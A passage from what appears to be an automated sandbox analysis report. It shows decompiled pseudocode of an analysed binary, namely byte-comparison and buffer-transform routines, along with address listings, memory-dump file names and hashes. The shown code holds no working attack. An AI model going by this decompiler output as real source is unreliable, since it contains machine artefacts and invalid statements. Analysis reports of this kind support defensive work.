    											if(_t345 >= 0x10) {
    												goto L49;
    											}
    											_t345 = _t345 + 1;
    											goto L43;
    										}
    										_t271 = _t270 - 1;
    										if(_t271 == 0) {
    											_t238 =  *(_t355 + 0x60);
    											if(_t238 < 0xfffffff0) {
    												goto L49;
    											}
    											_t238 = _t238 - 1;
    											L36:
    											 *(_t355 + 0x60) = _t238;
    											goto L49;
    										}
    										_t238 =  *(_t355 + 0x60);
    										if(_t271 != 1 || _t238 >= 0x10) {
    											goto L49;
    										} else {
    											_t238 = _t238 + 1;
    											goto L36;
    										}
    									}
    									L49:
    									_t306 =  *(_t355 + 0x24) + _t281;
    									 *(_t355 + 0x28) =  *(_t355 + 0x28) + 1;
    									 *(_t355 + 0x24) = _t306;
    								} while (_t306 <  *(_t355 + 0x30));
    								_t336 =  *(_t355 + 0x34);
    							}
    							_t336 = _t336 + 1;
    							 *(_t355 + 0x34) = _t336;
    						} while (_t336 < _t281);
    						goto L15;
    					}
    				}
    				if(_t311 != 6) {
    					goto L15;
    				}
    				_t309 = __ecx[5];
    				_t354 = 0;
    				_t325 = __ecx[1];
    				 *(_t355 + 0x28) = _t309;
    				 *(_t355 + 0x60) = _t309 + _t309;
    				if(_t309 > 0x20000 || _t325 > 0x400 || _t325 == 0) {
    					goto L98;
    				} else {
    					_t274 = _t325;
    					 *(_t355 + 0x24) = _t325;
    					do {
    						_t282 = 0;
    						_t338 = _t309;
    						if(_t309 <  *(_t355 + 0x60)) {
    							_t310 =  *(_t355 + 0x60);
    							goto L12;
    							L12:
    							_t275 =  *_t339;
    							_t282 = _t282 -  *((intOrPtr*)(_t275 + _t354));
    							_t354 = _t354 + 1;
    							 *((char*)(_t275 + _t338)) = _t282;
    							_t338 = _t338 + _t325;
    							if(_t338 < _t310) {
    								goto L12;
    							} else {
    								_t309 =  *(_t355 + 0x28);
    								_t274 =  *(_t355 + 0x24);
    								goto L14;
    							}
    						}
    						L14:
    						_t309 = _t309 + 1;
    						_t274 = _t274 - 1;
    						 *(_t355 + 0x28) = _t309;
    						 *(_t355 + 0x24) = _t274;
    					} while (_t274 != 0);
    					goto L15;
    				}
    			}









































































    0x0083bb6e
    0x0083bb78
    0x0083bb7d
    0x0083bc14
    0x00000000
    0x0083bc14
    0x0083bb86
    0x0083c05e
    0x0083c061
    0x0083c063
    0x0083c066
    0x0083c06f
    0x0083c0d0
    0x00000000
    0x0083c0d0
    0x0083c077
    0x0083c079
    0x0083c07b
    0x0083c081
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0083c087
    0x0083c087
    0x0083c087
    0x0083c089
    0x0083c08a
    0x0083c08b
    0x0083c08f
    0x0083c095
    0x0083c099
    0x0083c0ac
    0x0083c0b4
    0x0083c0b8
    0x0083c0b8
    0x0083c09b
    0x0083c0a0
    0x0083c0a2
    0x0083c0a8
    0x0083c0a8
    0x0083c0a0
    0x0083c0ba
    0x0083c0be
    0x0083c0c1
    0x0083c0c4
    0x0083c0c4
    0x0083c0c7
    0x00000000
    0x0083c0cb
    0x0083bb8f
    0x0083bf98
    0x0083bf9a
    0x0083bfa3
    0x00000000
    0x00000000
    0x0083bfac
    0x0083bfaf
    0x0083bfb5
    0x00000000
    0x00000000
    0x0083bfbf
    0x0083bfc0
    0x0083bfc4
    0x0083bfca
    0x0083bfcd
    0x00000000
    0x00000000
    0x0083bfcf
    0x0083bfd7
    0x00000000
    0x00000000
    0x0083bfd9
    0x0083bfdd
    0x0083bfdf
    0x0083bfe4
    0x0083bfe8
    0x0083bfec
    0x0083bfed
    0x0083bff4
    0x0083bff8
    0x0083c007
    0x0083c022
    0x0083c022
    0x0083c027
    0x0083c02b
    0x0083c02b
    0x0083c02f
    0x0083c030
    0x0083c033
    0x0083c037
    0x0083c03c
    0x0083c040
    0x0083c044
    0x0083c044
    0x0083c047
    0x0083c048
    0x0083c04b
    0x0083c04f
    0x0083c04f
    0x00000000
    0x0083c059
    0x0083bb98
    0x0083be4c
    0x0083be4f
    0x0083be52
    0x0083be55
    0x0083be59
    0x0083be5c
    0x0083be63
    0x0083be67
    0x0083be70
    0x00000000
    0x0083be87
    0x0083be87
    0x0083be89
    0x0083be8d
    0x0083be90
    0x0083be94
    0x0083be98
    0x0083be9a
    0x0083be9e
    0x0083bea2
    0x0083bea2
    0x0083bea6
    0x00000000
    0x00000000
    0x0083beac
    0x0083beb3
    0x0083beb7
    0x0083beb9
    0x0083bebd
    0x0083bec1
    0x0083bec5
    0x0083bec7
    0x0083beca
    0x0083bed2
    0x0083bed8
    0x0083bee6
    0x0083befb
    0x0083beff
    0x0083bf04
    0x0083bf08
    0x0083bf0b
    0x0083bf11
    0x0083bf21
    0x0083bf27
    0x0083bf2b
    0x0083bf2f
    0x0083bf31
    0x0083bf31
    0x0083bf17
    0x0083bf17
    0x0083bf1b
    0x0083bf1b
    0x0083bf11
    0x0083bf35
    0x0083bf3c
    0x0083bf3f
    0x0083bf47
    0x0083bf4a
    0x0083bf51
    0x0083bf51
    0x0083bf5b
    0x0083bf5f
    0x0083bf63
    0x0083bf67
    0x0083bf67
    0x0083bf68
    0x0083bf6c
    0x0083bf75
    0x0083bf79
    0x0083bf8c
    0x0083bf7e
    0x0083bf82
    0x0083bf85
    0x0083bf89
    0x0083bf89
    0x00000000
    0x0083bf90
    0x0083be70
    0x0083bba1
    0x0083bc20
    0x0083bc23
    0x0083bc25
    0x0083bc28
    0x0083bc2e
    0x0083bc32
    0x0083bc3b
    0x00000000
    0x0083bc55
    0x0083bc55
    0x0083bc57
    0x0083bc5d
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0083bc5f
    0x0083bc5f
    0x0083bc5f
    0x0083bc68
    0x0083bc6d
    0x0083bc6f
    0x0083bc74
    0x0083bc76
    0x0083bc7b
    0x0083bc83
    0x0083bc87
    0x0083bc8c
    0x0083bc90
    0x0083bc93
    0x0083bc9b
    0x0083bca1
    0x0083bca5
    0x0083bca5
    0x0083bcb3
    0x0083bcb7
    0x0083bcc0
    0x0083bcc4
    0x0083bcc8
    0x0083bcf1
    0x0083bcf3
    0x0083bd02
    0x0083bd06
    0x0083bd0a
    0x0083bd13
    0x0083bd23
    0x0083bd33
    0x0083bd43
    0x0083bd53
    0x0083bd61
    0x0083bd6e
    0x0083bd72
    0x0083bd7a
    0x0083be16
    0x0083be1a
    0x0083bd80
    0x0083bd80
    0x0083bd84
    0x0083bd86
    0x0083bd8c
    0x0083bd8d
    0x0083bd91
    0x0083bd93
    0x0083bd97
    0x0083bd97
    0x0083bd99
    0x0083bd9e
    0x0083bd9f
    0x0083bda4
    0x0083bda8
    0x0083bdab
    0x0083be0a
    0x0083be11
    0x0083be13
    0x0083be13
    0x00000000
    0x0083be11
    0x0083bdad
    0x0083bdb0
    0x0083bdfe
    0x0083be05
    0x0083be07
    0x0083be07
    0x00000000
    0x0083be05
    0x0083bdb2
    0x0083bdb5
    0x0083bdee
    0x0083bdf5
    0x00000000
    0x00000000
    0x0083bdf7
    0x0083bdf8
    0x0083bdf8
    0x00000000
    0x0083bdf8
    0x0083bdb7
    0x0083bdba
    0x0083bde2
    0x0083bde9
    0x00000000
    0x00000000
    0x0083bdeb
    0x00000000
    0x0083bdeb
    0x0083bdbc
    0x0083bdbf
    0x0083bdd6
    0x0083bddd
    0x00000000
    0x00000000
    0x0083bddf
    0x0083bdd0
    0x0083bdd0
    0x00000000
    0x0083bdd0
    0x0083bdc4
    0x0083bdc8
    0x00000000
    0x0083bdcf
    0x0083bdcf
    0x00000000
    0x0083bdcf
    0x0083bdc8
    0x0083be1e
    0x0083be22
    0x0083be24
    0x0083be28
    0x0083be2c
    0x0083be36
    0x0083be36
    0x0083be3a
    0x0083be3b
    0x0083be3f
    0x00000000
    0x0083be47
    0x0083bc3b
    0x0083bba6
    0x00000000
    0x00000000
    0x0083bba8
    0x0083bbab
    0x0083bbad
    0x0083bbb0
    0x0083bbb7
    0x0083bbc1
    0x00000000
    0x0083bbdb
    0x0083bbdb
    0x0083bbdd
    0x0083bbe1
    0x0083bbe1
    0x0083bbe3
    0x0083bbe9
    0x0083bbeb
    0x0083bbeb
    0x0083bbef
    0x0083bbef
    0x0083bbf1
    0x0083bbf4
    0x0083bbf5
    0x0083bbf8
    0x0083bbfc
    0x00000000
    0x0083bbfe
    0x0083bbfe
    0x0083bc02
    0x00000000
    0x0083bc02
    0x0083bbfc
    0x0083bc06
    0x0083bc06
    0x0083bc07
    0x0083bc0a
    0x0083bc0e
    0x0083bc0e
    0x00000000
    0x0083bbe1

    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 8aae2753320e0db542b4af19a8ac1aece7d89b2be491090a7013970d965d66e9
    • Instruction ID: a0fcaf1fbcba0ea6098e047849e125b0438460ccfec99241dbd25862ee6ca465
    • Opcode Fuzzy Hash: 8aae2753320e0db542b4af19a8ac1aece7d89b2be491090a7013970d965d66e9
    • Instruction Fuzzy Hash: 33F179B16083858FC718CE29C58456ABBE2FFC9318F145A2EF685D7341D730E945CB92
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00850113(void* __edx, void* __esi) {
    				signed int _t192;
    				signed char _t193;
    				signed char _t194;
    				signed char _t195;
    				signed char _t196;
    				signed char _t198;
    				signed int _t241;
    				void* _t287;
    				void* _t292;
    				void* _t294;
    				void* _t296;
    				void* _t298;
    				void* _t300;
    				void* _t302;
    				void* _t304;
    				void* _t306;
    				void* _t308;
    				void* _t310;
    				void* _t312;
    				void* _t314;
    				void* _t316;
    				void* _t318;
    				void* _t320;
    				void* _t322;
    				void* _t324;
    				void* _t326;
    				void* _t327;
    
    				_t327 = __esi;
    				_t287 = __edx;
    				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
    					_t241 = 0;
    					L15:
    					if(_t241 != 0) {
    						goto L2;
    					}
    					_t193 =  *(_t327 - 0x1a);
    					if(_t193 ==  *(_t287 - 0x1a)) {
    						_t241 = 0;
    						L26:
    						if(_t241 != 0) {
    							goto L2;
    						}
    						_t194 =  *(_t327 - 0x16);
    						if(_t194 ==  *(_t287 - 0x16)) {
    							_t241 = 0;
    							L37:
    							if(_t241 != 0) {
    								goto L2;
    							}
    							_t195 =  *(_t327 - 0x12);
    							if(_t195 ==  *(_t287 - 0x12)) {
    								_t241 = 0;
    								L48:
    								if(_t241 != 0) {
    									goto L2;
    								}
    								_t196 =  *(_t327 - 0xe);
    								if(_t196 ==  *(_t287 - 0xe)) {
    									_t241 = 0;
    									L59:
    									if(_t241 != 0) {
    										goto L2;
    									}
    									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
    										_t241 = 0;
    										L70:
    										if(_t241 != 0) {
    											goto L2;
    										}
    										_t198 =  *(_t327 - 6);
    										if(_t198 ==  *(_t287 - 6)) {
    											_t241 = 0;
    											L81:
    											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
    											}
    											goto L2;
    										}
    										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
    										if(_t292 == 0) {
    											L74:
    											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
    											if(_t294 == 0) {
    												L76:
    												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
    												if(_t296 == 0) {
    													L78:
    													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
    													if(_t241 != 0) {
    														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
    													}
    													goto L81;
    												}
    												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
    												if(_t241 != 0) {
    													goto L2;
    												}
    												goto L78;
    											}
    											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
    											if(_t241 != 0) {
    												goto L2;
    											}
    											goto L76;
    										}
    										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
    										if(_t241 != 0) {
    											goto L2;
    										}
    										goto L74;
    									}
    									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
    									if(_t298 == 0) {
    										L63:
    										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
    										if(_t300 == 0) {
    											L65:
    											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
    											if(_t302 == 0) {
    												L67:
    												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
    												if(_t241 != 0) {
    													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
    												}
    												goto L70;
    											}
    											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
    											if(_t241 != 0) {
    												goto L2;
    											}
    											goto L67;
    										}
    										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
    										if(_t241 != 0) {
    											goto L2;
    										}
    										goto L65;
    									}
    									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
    									if(_t241 != 0) {
    										goto L2;
    									}
    									goto L63;
    								}
    								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
    								if(_t304 == 0) {
    									L52:
    									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
    									if(_t306 == 0) {
    										L54:
    										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
    										if(_t308 == 0) {
    											L56:
    											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
    											if(_t241 != 0) {
    												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
    											}
    											goto L59;
    										}
    										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
    										if(_t241 != 0) {
    											goto L2;
    										}
    										goto L56;
    									}
    									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
    									if(_t241 != 0) {
    										goto L2;
    									}
    									goto L54;
    								}
    								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
    								if(_t241 != 0) {
    									goto L2;
    								}
    								goto L52;
    							}
    							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
    							if(_t310 == 0) {
    								L41:
    								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
    								if(_t312 == 0) {
    									L43:
    									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
    									if(_t314 == 0) {
    										L45:
    										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
    										if(_t241 != 0) {
    											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
    										}
    										goto L48;
    									}
    									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
    									if(_t241 != 0) {
    										goto L2;
    									}
    									goto L45;
    								}
    								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
    								if(_t241 != 0) {
    									goto L2;
    								}
    								goto L43;
    							}
    							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
    							if(_t241 != 0) {
    								goto L2;
    							}
    							goto L41;
    						}
    						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
    						if(_t316 == 0) {
    							L30:
    							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
    							if(_t318 == 0) {
    								L32:
    								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
    								if(_t320 == 0) {
    									L34:
    									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
    									if(_t241 != 0) {
    										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
    									}
    									goto L37;
    								}
    								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
    								if(_t241 != 0) {
    									goto L2;
    								}
    								goto L34;
    							}
    							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
    							if(_t241 != 0) {
    								goto L2;
    							}
    							goto L32;
    						}
    						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
    						if(_t241 != 0) {
    							goto L2;
    						}
    						goto L30;
    					}
    					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
    					if(_t322 == 0) {
    						L19:
    						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
    						if(_t324 == 0) {
    							L21:
    							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
    							if(_t326 == 0) {
    								L23:
    								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
    								if(_t241 != 0) {
    									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
    								}
    								goto L26;
    							}
    							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
    							if(_t241 != 0) {
    								goto L2;
    							}
    							goto L23;
    						}
    						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
    						if(_t241 != 0) {
    							goto L2;
    						}
    						goto L21;
    					}
    					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
    					if(_t241 != 0) {
    						goto L2;
    					}
    					goto L19;
    				} else {
    					__edi = __al & 0x000000ff;
    					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
    					if(__edi == 0) {
    						L8:
    						__edi =  *(__esi - 0x1d) & 0x000000ff;
    						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
    						if(__edi == 0) {
    							L10:
    							__edi =  *(__esi - 0x1c) & 0x000000ff;
    							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
    							if(__edi == 0) {
    								L12:
    								__ecx =  *(__esi - 0x1b) & 0x000000ff;
    								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
    								if(__ecx != 0) {
    									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
    								}
    								goto L15;
    							}
    							0 = 0 | __edi > 0x00000000;
    							__ecx = (__edi > 0) * 2 != 1;
    							if((__edi > 0) * 2 != 1) {
    								L2:
    								_t192 = _t241;
    								return _t192;
    							}
    							goto L12;
    						}
    						0 = 0 | __edi > 0x00000000;
    						__ecx = (__edi > 0) * 2 != 1;
    						if((__edi > 0) * 2 != 1) {
    							goto L2;
    						}
    						goto L10;
    					}
    					0 = 0 | __edi > 0x00000000;
    					__ecx = (__edi > 0) * 2 != 1;
    					if((__edi > 0) * 2 != 1) {
    						goto L2;
    					}
    					goto L8;
    				}
    			}






























    0x00850113
    0x00850113
    0x00850119
    0x008501a0
    0x008501a2
    0x008501a4
    0x00000000
    0x00000000
    0x008501aa
    0x008501b0
    0x00850237
    0x00850239
    0x0085023b
    0x00000000
    0x00000000
    0x00850241
    0x00850247
    0x008502ce
    0x008502d0
    0x008502d2
    0x00000000
    0x00000000
    0x008502d8
    0x008502de
    0x00850365
    0x00850367
    0x00850369
    0x00000000
    0x00000000
    0x0085036f
    0x00850375
    0x008503fc
    0x008503fe
    0x00850400
    0x00000000
    0x00000000
    0x0085040c
    0x00850494
    0x00850496
    0x00850498
    0x00000000
    0x00000000
    0x0085049e
    0x008504a4
    0x0085052b
    0x0085052d
    0x0085052f
    0x0085052f
    0x00000000
    0x0085052f
    0x008504b1
    0x008504b3
    0x008504cb
    0x008504d3
    0x008504d5
    0x008504ed
    0x008504f5
    0x008504f7
    0x0085050f
    0x00850517
    0x00850519
    0x00850522
    0x00850522
    0x00000000
    0x00850519
    0x00850500
    0x00850509
    0x00000000
    0x00000000
    0x00000000
    0x00850509
    0x008504de
    0x008504e7
    0x00000000
    0x00000000
    0x00000000
    0x008504e7
    0x008504bc
    0x008504c5
    0x00000000
    0x00000000
    0x00000000
    0x008504c5
    0x0085041a
    0x0085041c
    0x00850434
    0x0085043c
    0x0085043e
    0x00850456
    0x0085045e
    0x00850460
    0x00850478
    0x00850480
    0x00850482
    0x0085048b
    0x0085048b
    0x00000000
    0x00850482
    0x00850469
    0x00850472
    0x00000000
    0x00000000
    0x00000000
    0x00850472
    0x00850447
    0x00850450
    0x00000000
    0x00000000
    0x00000000
    0x00850450
    0x00850425
    0x0085042e
    0x00000000
    0x00000000
    0x00000000
    0x0085042e
    0x00850382
    0x00850384
    0x0085039c
    0x008503a4
    0x008503a6
    0x008503be
    0x008503c6
    0x008503c8
    0x008503e0
    0x008503e8
    0x008503ea
    0x008503f3
    0x008503f3
    0x00000000
    0x008503ea
    0x008503d1
    0x008503da
    0x00000000
    0x00000000
    0x00000000
    0x008503da
    0x008503af
    0x008503b8
    0x00000000
    0x00000000
    0x00000000
    0x008503b8
    0x0085038d
    0x00850396
    0x00000000
    0x00000000
    0x00000000
    0x00850396
    0x008502eb
    0x008502ed
    0x00850305
    0x0085030d
    0x0085030f
    0x00850327
    0x0085032f
    0x00850331
    0x00850349
    0x00850351
    0x00850353
    0x0085035c
    0x0085035c
    0x00000000
    0x00850353
    0x0085033a
    0x00850343
    0x00000000
    0x00000000
    0x00000000
    0x00850343
    0x00850318
    0x00850321
    0x00000000
    0x00000000
    0x00000000
    0x00850321
    0x008502f6
    0x008502ff
    0x00000000
    0x00000000
    0x00000000
    0x008502ff
    0x00850254
    0x00850256
    0x0085026e
    0x00850276
    0x00850278
    0x00850290
    0x00850298
    0x0085029a
    0x008502b2
    0x008502ba
    0x008502bc
    0x008502c5
    0x008502c5
    0x00000000
    0x008502bc
    0x008502a3
    0x008502ac
    0x00000000
    0x00000000
    0x00000000
    0x008502ac
    0x00850281
    0x0085028a
    0x00000000
    0x00000000
    0x00000000
    0x0085028a
    0x0085025f
    0x00850268
    0x00000000
    0x00000000
    0x00000000
    0x00850268
    0x008501bd
    0x008501bf
    0x008501d7
    0x008501df
    0x008501e1
    0x008501f9
    0x00850201
    0x00850203
    0x0085021b
    0x00850223
    0x00850225
    0x0085022e
    0x0085022e
    0x00000000
    0x00850225
    0x0085020c
    0x00850215
    0x00000000
    0x00000000
    0x00000000
    0x00850215
    0x008501ea
    0x008501f3
    0x00000000
    0x00000000
    0x00000000
    0x008501f3
    0x008501c8
    0x008501d1
    0x00000000
    0x00000000
    0x00000000
    0x0085011f
    0x0085011f
    0x00850126
    0x00850128
    0x00850140
    0x00850140
    0x00850148
    0x0085014a
    0x00850162
    0x00850162
    0x0085016a
    0x0085016c
    0x00850184
    0x00850184
    0x0085018c
    0x0085018e
    0x00850197
    0x00850197
    0x00000000
    0x0085018e
    0x00850172
    0x00850175
    0x0085017e
    0x0084fcd6
    0x0084fcd6
    0x00850ac7
    0x00850ac7
    0x00000000
    0x0085017e
    0x00850150
    0x00850153
    0x0085015c
    0x00000000
    0x00000000
    0x00000000
    0x0085015c
    0x0085012e
    0x00850131
    0x0085013a
    0x00000000
    0x00000000
    0x00000000
    0x0085013a

    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
    • Instruction ID: 606937a5280eb4ac5d0f80a773112e2224892996da059fdc7301f07cc561c186
    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
    • Instruction Fuzzy Hash: D7C197722051AB0BDF2D4639857417EBAA1FBA17B231A076DDCB3CB1D5FE20C568DA10
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00850548(void* __edx, void* __esi) {
    				signed int _t197;
    				signed char _t198;
    				signed char _t199;
    				signed char _t200;
    				signed char _t202;
    				signed char _t203;
    				signed int _t246;
    				void* _t294;
    				void* _t297;
    				void* _t299;
    				void* _t301;
    				void* _t303;
    				void* _t305;
    				void* _t307;
    				void* _t309;
    				void* _t311;
    				void* _t313;
    				void* _t315;
    				void* _t317;
    				void* _t319;
    				void* _t321;
    				void* _t323;
    				void* _t325;
    				void* _t327;
    				void* _t329;
    				void* _t331;
    				void* _t333;
    				void* _t335;
    				void* _t336;
    
    				_t336 = __esi;
    				_t294 = __edx;
    				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
    					_t246 = 0;
    					L14:
    					if(_t246 != 0) {
    						goto L1;
    					}
    					_t198 =  *(_t336 - 0x1b);
    					if(_t198 ==  *(_t294 - 0x1b)) {
    						_t246 = 0;
    						L25:
    						if(_t246 != 0) {
    							goto L1;
    						}
    						_t199 =  *(_t336 - 0x17);
    						if(_t199 ==  *(_t294 - 0x17)) {
    							_t246 = 0;
    							L36:
    							if(_t246 != 0) {
    								goto L1;
    							}
    							_t200 =  *(_t336 - 0x13);
    							if(_t200 ==  *(_t294 - 0x13)) {
    								_t246 = 0;
    								L47:
    								if(_t246 != 0) {
    									goto L1;
    								}
    								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
    									_t246 = 0;
    									L58:
    									if(_t246 != 0) {
    										goto L1;
    									}
    									_t202 =  *(_t336 - 0xb);
    									if(_t202 ==  *(_t294 - 0xb)) {
    										_t246 = 0;
    										L69:
    										if(_t246 != 0) {
    											goto L1;
    										}
    										_t203 =  *(_t336 - 7);
    										if(_t203 ==  *(_t294 - 7)) {
    											_t246 = 0;
    											L80:
    											if(_t246 != 0) {
    												goto L1;
    											}
    											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
    											if(_t297 == 0) {
    												L83:
    												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
    												if(_t299 == 0) {
    													L3:
    													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
    													if(_t246 != 0) {
    														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
    													}
    													goto L1;
    												}
    												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
    												if(_t246 != 0) {
    													goto L1;
    												} else {
    													goto L3;
    												}
    											}
    											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
    											if(_t246 != 0) {
    												goto L1;
    											}
    											goto L83;
    										}
    										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
    										if(_t301 == 0) {
    											L73:
    											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
    											if(_t303 == 0) {
    												L75:
    												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
    												if(_t305 == 0) {
    													L77:
    													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
    													if(_t246 != 0) {
    														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
    													}
    													goto L80;
    												}
    												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
    												if(_t246 != 0) {
    													goto L1;
    												}
    												goto L77;
    											}
    											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
    											if(_t246 != 0) {
    												goto L1;
    											}
    											goto L75;
    										}
    										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
    										if(_t246 != 0) {
    											goto L1;
    										}
    										goto L73;
    									}
    									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
    									if(_t307 == 0) {
    										L62:
    										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
    										if(_t309 == 0) {
    											L64:
    											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
    											if(_t311 == 0) {
    												L66:
    												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
    												if(_t246 != 0) {
    													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
    												}
    												goto L69;
    											}
    											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
    											if(_t246 != 0) {
    												goto L1;
    											}
    											goto L66;
    										}
    										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
    										if(_t246 != 0) {
    											goto L1;
    										}
    										goto L64;
    									}
    									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
    									if(_t246 != 0) {
    										goto L1;
    									}
    									goto L62;
    								}
